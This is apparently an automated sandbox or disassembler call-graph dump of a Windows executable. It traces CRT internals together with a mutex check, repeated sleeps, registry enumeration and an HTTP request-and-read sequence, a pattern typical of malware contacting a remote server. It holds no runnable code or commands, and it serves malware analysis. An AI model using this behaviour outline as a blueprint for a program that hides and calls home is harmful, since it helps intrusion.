Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36681->36682 36683 b809d4 36682->36683 36684 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36683->36684 36685 b812e0 36684->36685 36686 b7e530 12 API calls 36685->36686 36687 b812e9 36686->36687 36688->36479 36691 ba667e __FrameHandler3::FrameUnwindToState 36689->36691 36690 ba6685 36692 ba75f6 __dosmaperr RtlAllocateHeap 36690->36692 36691->36690 36693 ba66a5 36691->36693 36694 ba668a 36692->36694 36695 ba66aa 36693->36695 36696 ba66b7 36693->36696 36707 ba6c5a RtlAllocateHeap __cftof 36694->36707 36698 ba75f6 __dosmaperr RtlAllocateHeap 36695->36698 36703 baa8c3 36696->36703 36702 ba6695 36698->36702 36700 ba66c0 36701 ba75f6 __dosmaperr RtlAllocateHeap 36700->36701 36700->36702 36701->36702 36702->36490 36704 baa8cf __FrameHandler3::FrameUnwindToState 36703->36704 36708 baa967 36704->36708 36706 baa8ea 36706->36700 36707->36702 36709 baa98a ___scrt_uninitialize_crt 36708->36709 36710 bad82f __dosmaperr RtlAllocateHeap 36709->36710 36713 baa9d0 ___scrt_uninitialize_crt __wsopen_s 36709->36713 36711 baa9eb 36710->36711 36714 baadf5 RtlAllocateHeap __dosmaperr 36711->36714 36713->36706 36714->36713 36715->36499 36716->36499 36735 ba868d 36717->36735 36719 ba88b3 36720 ba690a __cftof 3 API calls 36719->36720 36723 ba88bf 36720->36723 36721 ba887a 36721->36719 36722 ba888f 36721->36722 36734 b8104d 36721->36734 36724 ba75f6 __dosmaperr RtlAllocateHeap 36722->36724 36728 ba88ee 36723->36728 36743 ba6d52 4 API calls 2 library calls 36723->36743 36725 ba8894 36724->36725 36742 ba6c5a RtlAllocateHeap __cftof 36725->36742 36731 ba8958 36728->36731 36744 ba8a8d RtlAllocateHeap __cftof __dosmaperr 36728->36744 36745 ba8a8d RtlAllocateHeap __cftof __dosmaperr 36731->36745 36732 ba8a20 36733 ba75f6 __dosmaperr RtlAllocateHeap 36732->36733 36732->36734 36733->36734 36734->36446 36734->36448 36736 ba8692 36735->36736 36737 ba86a5 36735->36737 36738 ba75f6 __dosmaperr RtlAllocateHeap 36736->36738 36737->36721 36739 ba8697 36738->36739 36746 ba6c5a RtlAllocateHeap __cftof 36739->36746 36741 ba86a2 36741->36721 36742->36734 36743->36723 36744->36731 36745->36732 36746->36741 36747->36509 36748->36514 36749->36506 36751 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36750->36751 36752 b77465 36751->36752 36753 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36752->36753 36754 b77478 36753->36754 36755 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36754->36755 36756 b77488 36755->36756 36757 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36756->36757 36758 b7749d 36757->36758 36759 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36758->36759 36760 b774b2 36759->36760 36761 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36760->36761 36762 b774c4 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 36761->36762 36794 b87f80 2 API calls 4 library calls 36763->36794 36765 b7596b 36766 b759e0 36765->36766 36795 b87f80 2 API calls 4 library calls 36766->36795 36768 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36780 b75a45 36768->36780 36769 b75c09 36797 b88200 RtlAllocateHeap RtlAllocateHeap 36769->36797 36770 b75bdd __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 36770->36526 36772 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36772->36780 36780->36768 36780->36769 36780->36770 36780->36772 36796 b75730 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 36780->36796 36788 b74dc2 36787->36788 36792 b74b92 36787->36792 36788->36528 36790 b74ce5 36790->36788 36800 b88ca0 2 API calls 4 library calls 36790->36800 36792->36790 36798 ba6da6 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap __fassign 36792->36798 36799 b88ca0 2 API calls 4 library calls 36792->36799 36794->36765 36795->36780 36796->36780 36798->36792 36799->36792 36800->36790 36802 b89294 36801->36802 36805 b892a5 __InternalCxxFrameHandler std::_Rethrow_future_exception 36802->36805 36865 b894e0 2 API calls 4 library calls 36802->36865 36804 b8932b 36804->36544 36805->36544 36807 b88339 36806->36807 36809 b8834d __InternalCxxFrameHandler 36807->36809 36866 b88f40 36807->36866 36809->36546 36811 b88248 36810->36811 36812 b88292 36810->36812 36811->36812 36813 b88251 36811->36813 36816 b88f40 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36812->36816 36817 b882a1 __InternalCxxFrameHandler 36812->36817 36814 b89280 2 API calls 36813->36814 36815 b8825a 36814->36815 36815->36548 36816->36817 36817->36548 36819 b7be82 36818->36819 36820 b7c281 36818->36820 36819->36820 36822 b7be96 Sleep InternetOpenW InternetConnectA 36819->36822 36821 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36820->36821 36827 b7c22e _Ref_count_obj 36821->36827 36823 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36822->36823 36824 b7bf18 36823->36824 36826 b75c10 5 API calls 36824->36826 36825 b7c27c __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 36825->36558 36828 b7bf23 HttpOpenRequestA 36826->36828 36827->36825 36829 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36827->36829 36834 b7bf4c _Ref_count_obj 36828->36834 36830 b7c354 36829->36830 36832 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36833 b7bfb4 36832->36833 36835 b75c10 5 API calls 36833->36835 36834->36832 36836 b7bfbf 36835->36836 36837 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36836->36837 36838 b7bfd8 36837->36838 36839 b75c10 5 API calls 36838->36839 36840 b7bfe3 HttpSendRequestA 36839->36840 36843 b7c006 _Ref_count_obj 36840->36843 36842 b7c08e InternetReadFile 36844 b7c0b5 __InternalCxxFrameHandler 36842->36844 36843->36842 36845 b7c13f InternetReadFile 36844->36845 36845->36844 36850 b786a0 _Ref_count_obj 36846->36850 36854 b785d5 _Ref_count_obj 36846->36854 36847 b78767 36883 b88200 RtlAllocateHeap RtlAllocateHeap 36847->36883 36848 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36848->36854 36851 b78740 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 36850->36851 36852 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36850->36852 36851->36566 36853 b78771 36852->36853 36854->36847 36854->36848 36854->36850 36884 b87760 36855->36884 36857 b88439 36858 b88f40 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36857->36858 36859 b88454 __InternalCxxFrameHandler 36857->36859 36858->36859 36860 b88f40 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36859->36860 36862 b884a8 __InternalCxxFrameHandler 36859->36862 36861 b884ee 36860->36861 36861->36577 36862->36577 36863->36642 36864->36644 36865->36804 36867 b88f6b 36866->36867 36868 b8908e 36866->36868 36872 b88fdc 36867->36872 36873 b88fb2 36867->36873 36881 b89270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 36868->36881 36870 b89093 36882 b72480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 36870->36882 36875 b88fc3 std::_Rethrow_future_exception 36872->36875 36878 b8d3e2 Hash 2 API calls 36872->36878 36873->36870 36874 b88fbd 36873->36874 36877 b8d3e2 Hash 2 API calls 36874->36877 36876 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36875->36876 36879 b8904c std::_Rethrow_future_exception _Ref_count_obj 36875->36879 36880 b8909d 36876->36880 36877->36875 36878->36875 36879->36809 36882->36875 36885 b8777b 36884->36885 36897 b87864 std::_Rethrow_future_exception _Ref_count_obj 36884->36897 36886 b878f1 36885->36886 36889 b877ea 36885->36889 36890 b87811 36885->36890 36896 b877fb std::_Rethrow_future_exception 36885->36896 36885->36897 36898 b89270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 36886->36898 36888 b878f6 36899 b72480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 36888->36899 36889->36888 36893 b8d3e2 Hash 2 API calls 36889->36893 36894 b8d3e2 Hash 2 API calls 36890->36894 36890->36896 36892 b878fb 36893->36896 36894->36896 36895 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36895->36886 36896->36895 36896->36897 36897->36857 36899->36892 36900 b7a682 GetFileAttributesA 36904 b7a692 _Ref_count_obj 36900->36904 36901 b7a949 36903 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36901->36903 36902 b7a75d _Ref_count_obj 36906 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36902->36906 36905 b7a94e 36903->36905 36904->36901 36904->36902 36907 b7a953 Sleep CreateMutexA 36905->36907 36908 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36905->36908 36910 b7a903 36906->36910 36912 b7a98e 36907->36912 36908->36907 36911 b7a9a7 36912->36911 36915 ba6629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 36912->36915 36914 b7a9b0 36915->36914 36916 b86d00 CreateThread 36917 b86d20 Sleep 36916->36917 36918 b86c70 36916->36918 36917->36917 36921 b86ca0 36918->36921 36919 b87a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 36919->36921 36920 b75c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 36920->36921 36921->36919 36921->36920 36923 b847b0 36921->36923 36924 b847eb 36923->36924 36927 b84ee3 _Ref_count_obj 36923->36927 36926 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36924->36926 36924->36927 36925 b84f59 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 36925->36921 36928 b8480c 36926->36928 36927->36925 36929 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36927->36929 36930 b75c10 5 API calls 36928->36930 36931 b84fba 36929->36931 36932 b84813 36930->36932 36933 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36932->36933 36934 b84825 36933->36934 36935 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36934->36935 36936 b84837 36935->36936 36937 b7be30 12 API calls 36936->36937 36938 b84843 36937->36938 36939 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36938->36939 36940 b84858 36939->36940 36941 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36940->36941 36942 b84870 36941->36942 36943 b75c10 5 API calls 36942->36943 36944 b84877 36943->36944 36945 b78580 2 API calls 36944->36945 36946 b84883 36945->36946 36947 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36946->36947 37014 b84afd 36946->37014 36949 b8489f 36947->36949 36948 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36950 b84b2f 36948->36950 36951 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36949->36951 36952 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36950->36952 36953 b848b7 36951->36953 36954 b84b44 36952->36954 36955 b75c10 5 API calls 36953->36955 36956 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36954->36956 36958 b848be 36955->36958 36957 b84b56 36956->36957 36960 b7be30 12 API calls 36957->36960 36959 b78580 2 API calls 36958->36959 36961 b848ca 36959->36961 36962 b84b62 36960->36962 36964 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36961->36964 36961->37014 36963 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36962->36963 36965 b84b77 36963->36965 36966 b848e7 36964->36966 36967 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36965->36967 36968 b75c10 5 API calls 36966->36968 36969 b84b8f 36967->36969 36973 b848ef 36968->36973 36970 b75c10 5 API calls 36969->36970 36971 b84b96 36970->36971 36972 b78580 2 API calls 36971->36972 36974 b84ba2 36972->36974 36975 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36973->36975 36976 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36974->36976 36978 b84e70 _Ref_count_obj 36974->36978 36985 b84959 _Ref_count_obj 36975->36985 36977 b84bbe 36976->36977 36979 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36977->36979 36978->36927 36980 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36978->36980 36981 b84bd6 36979->36981 36980->36927 36982 b75c10 5 API calls 36981->36982 36984 b84bdd 36982->36984 36983 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36986 b849e6 36983->36986 36987 b78580 2 API calls 36984->36987 36985->36983 36988 b75c10 5 API calls 36986->36988 36989 b84be9 36987->36989 36991 b849ee 36988->36991 36989->36978 36990 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36989->36990 36992 b84c06 36990->36992 36993 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36991->36993 36994 b75c10 5 API calls 36992->36994 36997 b84a49 _Ref_count_obj 36993->36997 36995 b84c0e 36994->36995 36998 b84c5a 36995->36998 36999 b84f97 36995->36999 36997->37014 37054 b798f0 36997->37054 37002 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36998->37002 37062 b88200 RtlAllocateHeap RtlAllocateHeap 36999->37062 37000 b84ad5 37004 ba75f6 __dosmaperr RtlAllocateHeap 37000->37004 37000->37014 37010 b84c78 _Ref_count_obj 37002->37010 37003 b84f9c 37063 b8c1d9 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 37003->37063 37006 b84ade 37004->37006 37011 ba8ab6 4 API calls 37006->37011 37007 b84cec _Ref_count_obj 37012 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37007->37012 37008 b84fa6 37009 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37008->37009 37013 b84fab 37009->37013 37010->37007 37010->37008 37011->37014 37015 b84d05 37012->37015 37016 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37013->37016 37014->36948 37014->37003 37017 b75c10 5 API calls 37015->37017 37016->36978 37018 b84d0d 37017->37018 37019 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37018->37019 37022 b84d68 _Ref_count_obj 37019->37022 37020 b84ddc _Ref_count_obj 37021 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37020->37021 37023 b84df7 37021->37023 37022->37013 37022->37020 37024 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37023->37024 37025 b84e0c 37024->37025 37026 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37025->37026 37027 b84e27 37026->37027 37028 b75c10 5 API calls 37027->37028 37029 b84e2e 37028->37029 37030 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37029->37030 37031 b84e67 37030->37031 37033 b84390 37031->37033 37034 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37033->37034 37035 b843d2 37034->37035 37036 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37035->37036 37037 b843e4 37036->37037 37038 b78580 2 API calls 37037->37038 37039 b843ed 37038->37039 37040 b84646 37039->37040 37052 b843f8 _Ref_count_obj 37039->37052 37041 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37040->37041 37042 b84657 37041->37042 37043 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37042->37043 37045 b8466c 37043->37045 37044 b880c0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37044->37052 37046 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37045->37046 37049 b8467e 37046->37049 37047 b84610 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 37047->36978 37048 b89280 2 API calls 37048->37052 37050 b83640 14 API calls 37049->37050 37050->37047 37051 b87a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37051->37052 37052->37044 37052->37047 37052->37048 37052->37051 37064 b83640 37052->37064 37055 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37054->37055 37056 b7991e 37055->37056 37057 b75c10 5 API calls 37056->37057 37059 b79927 Mailbox 37057->37059 37058 b799c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 37058->37000 37059->37058 37060 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37059->37060 37061 b799f2 37060->37061 37063->37008 37065 b8367f 37064->37065 37112 b83e6f _Ref_count_obj 37064->37112 37066 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37065->37066 37067 b836b0 37066->37067 37068 b84327 37067->37068 37070 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37067->37070 37199 b88200 RtlAllocateHeap RtlAllocateHeap 37068->37199 37069 b84302 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z _Ref_count_obj 37069->37052 37073 b836ff 37070->37073 37072 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37072->37112 37073->37068 37076 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37073->37076 37074 b8432c 37200 b88200 RtlAllocateHeap RtlAllocateHeap 37074->37200 37078 b83743 37076->37078 37077 b84331 37079 b84336 37077->37079 37080 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37077->37080 37078->37068 37082 b83765 37078->37082 37081 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37079->37081 37080->37079 37083 b8433b 37081->37083 37084 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37082->37084 37201 b88200 RtlAllocateHeap RtlAllocateHeap 37083->37201 37086 b83785 37084->37086 37088 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37086->37088 37087 b84340 37089 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37087->37089 37090 b83798 37088->37090 37092 b84345 37089->37092 37091 b75c10 5 API calls 37090->37091 37096 b837a3 37091->37096 37093 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37092->37093 37094 b8434a 37093->37094 37202 b8c199 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 37094->37202 37096->37074 37097 b837ef 37096->37097 37099 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37097->37099 37098 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37100 b84359 37098->37100 37101 b83811 37099->37101 37203 b8c1d9 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 37100->37203 37101->37077 37103 b83845 _Ref_count_obj 37101->37103 37104 b798f0 5 API calls 37103->37104 37105 b83872 37104->37105 37106 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37105->37106 37111 b83c79 _Ref_count_obj 37105->37111 37107 b83889 37106->37107 37108 b75c10 5 API calls 37107->37108 37109 b83894 37108->37109 37110 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37109->37110 37114 b838dc _Ref_count_obj 37110->37114 37111->37098 37111->37112 37112->37069 37112->37072 37113 b8397e _Ref_count_obj 37113->37083 37116 b839bd 37113->37116 37175 b83b49 _Ref_count_obj 37113->37175 37114->37079 37114->37113 37115 ba75f6 __dosmaperr RtlAllocateHeap 37117 b83b58 37115->37117 37118 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37116->37118 37119 ba8ab6 4 API calls 37117->37119 37120 b839da 37118->37120 37121 b83b7a 37119->37121 37195 b7ad70 5 API calls 4 library calls 37120->37195 37121->37094 37123 b83b89 37121->37123 37123->37100 37123->37111 37126 b83c8d 37123->37126 37127 b83ba2 37123->37127 37128 b83f42 37123->37128 37129 b83e74 37123->37129 37124 b83a77 _Ref_count_obj 37130 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37124->37130 37125 b839e5 _Ref_count_obj 37125->37087 37125->37124 37134 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37126->37134 37131 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37127->37131 37135 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37128->37135 37132 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37129->37132 37133 b83a96 37130->37133 37136 b83bca 37131->37136 37137 b83e9c 37132->37137 37138 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37133->37138 37139 b83cb5 37134->37139 37140 b83f56 37135->37140 37143 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37136->37143 37144 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37137->37144 37145 b83aa8 37138->37145 37141 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37139->37141 37142 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37140->37142 37148 b83cd3 37141->37148 37149 b83f6e 37142->37149 37150 b83be8 37143->37150 37146 b83eba 37144->37146 37196 b749a0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback _Ref_count_obj 37145->37196 37151 b75c10 5 API calls 37146->37151 37152 b75c10 5 API calls 37148->37152 37153 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37149->37153 37154 b75c10 5 API calls 37150->37154 37155 b83ec1 37151->37155 37156 b83cda 37152->37156 37157 b83f86 37153->37157 37158 b83bef 37154->37158 37159 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37155->37159 37160 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37156->37160 37161 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37157->37161 37162 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37158->37162 37163 b83ed9 37159->37163 37165 b83cef 37160->37165 37166 b83f98 37161->37166 37167 b83c07 37162->37167 37169 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37163->37169 37164 b83ab7 _Ref_count_obj 37164->37092 37164->37175 37170 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37165->37170 37198 b82f10 14 API calls 4 library calls 37166->37198 37168 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37167->37168 37172 b83c1f 37168->37172 37173 b83ef1 37169->37173 37174 b83d07 37170->37174 37176 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37172->37176 37177 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37173->37177 37178 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37174->37178 37175->37115 37179 b83c37 37176->37179 37180 b83f09 37177->37180 37181 b83d1f 37178->37181 37182 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37179->37182 37183 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37180->37183 37184 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37181->37184 37185 b83c4f 37182->37185 37186 b83f21 37183->37186 37187 b83d37 37184->37187 37188 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37185->37188 37189 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37186->37189 37190 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37187->37190 37191 b83c67 37188->37191 37189->37191 37192 b83d49 37190->37192 37194 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37191->37194 37197 b81ec0 14 API calls 4 library calls 37192->37197 37194->37111 37195->37125 37196->37164 37197->37111 37198->37111 37203->37112 37218 b8d762 37219 b8d76e __FrameHandler3::FrameUnwindToState 37218->37219 37239 b8d488 37219->37239 37221 b8d8ce ___scrt_fastfail 37260 ba6629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 37221->37260 37223 b8d8db 37261 ba65ed GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 37223->37261 37225 b8d8e3 ___security_init_cookie 37227 b8d8e9 __scrt_common_main_seh 37225->37227 37226 b8d7be 37228 b8d83f 37243 ba95bc 37228->37243 37230 b8d775 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 37230->37221 37230->37226 37230->37228 37259 ba6603 3 API calls 3 library calls 37230->37259 37232 b8d845 37247 b86d30 37232->37247 37240 b8d491 37239->37240 37242 b8d4a6 ___scrt_uninitialize_crt 37240->37242 37262 ba9a28 37240->37262 37242->37230 37244 ba95c5 37243->37244 37246 ba95ca 37243->37246 37286 ba9320 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 37244->37286 37246->37232 37287 b7a960 Sleep CreateMutexA 37247->37287 37251 b86d45 37252 b7d6d0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 37251->37252 37253 b86d4a 37252->37253 37254 b84fc0 7 API calls 37253->37254 37255 b86d4f 37254->37255 37256 b76020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap RtlAllocateHeap 37255->37256 37257 b86d54 37256->37257 37258 b76020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap RtlAllocateHeap 37257->37258 37258->37257 37259->37228 37260->37223 37261->37225 37265 baee7e 37262->37265 37266 baee8e 37265->37266 37267 ba9a37 37265->37267 37266->37267 37269 bac54b 37266->37269 37267->37242 37270 bac557 __FrameHandler3::FrameUnwindToState 37269->37270 37275 babdc4 37270->37275 37272 bac56d 37274 bac577 37272->37274 37284 bac3e1 RtlAllocateHeap 37272->37284 37274->37266 37276 babdd0 __FrameHandler3::FrameUnwindToState 37275->37276 37277 babdfa __FrameHandler3::FrameUnwindToState 37276->37277 37278 babdd9 37276->37278 37282 babde8 37277->37282 37283 babd14 __wsopen_s RtlAllocateHeap 37277->37283 37279 ba75f6 __dosmaperr RtlAllocateHeap 37278->37279 37280 babdde 37279->37280 37285 ba6c5a RtlAllocateHeap __cftof 37280->37285 37282->37272 37283->37277 37284->37274 37285->37282 37286->37246 37289 b7a98e 37287->37289 37288 b7a9a7 37292 b7ce40 37288->37292 37289->37288 37297 ba6629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 37289->37297 37291 b7a9b0 37293 b87a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37292->37293 37294 b7ce92 37293->37294 37295 b75c10 5 API calls 37294->37295 37296 b7ce9d 37295->37296 37297->37291 37298 b7a54d GetFileAttributesA 37302 b7a55d _Ref_count_obj 37298->37302 37299 b7a628 _Ref_count_obj 37304 b880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37299->37304 37300 b7a944 37301 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37300->37301 37303 b7a949 37301->37303 37302->37299 37302->37300 37305 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37303->37305 37306 b7a903 37304->37306 37307 b7a94e 37305->37307 37308 b7a953 Sleep CreateMutexA 37307->37308 37309 ba6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37307->37309 37312 b7a98e 37308->37312 37309->37308 37311 b7a9a7 37312->37311 37315 ba6629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 37312->37315 37314 b7a9b0 37315->37314 37316 bac1c4 37317 bac367 37316->37317 37319 bac1ee 37316->37319 37318 ba75f6 __dosmaperr RtlAllocateHeap 37317->37318 37320 bac352 __cftof __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37318->37320 37319->37317 37321 bac239 37319->37321 37329 bb2139 RtlAllocateHeap __cftof __dosmaperr 37321->37329 37323 bac26d 37323->37320 37330 bb2165 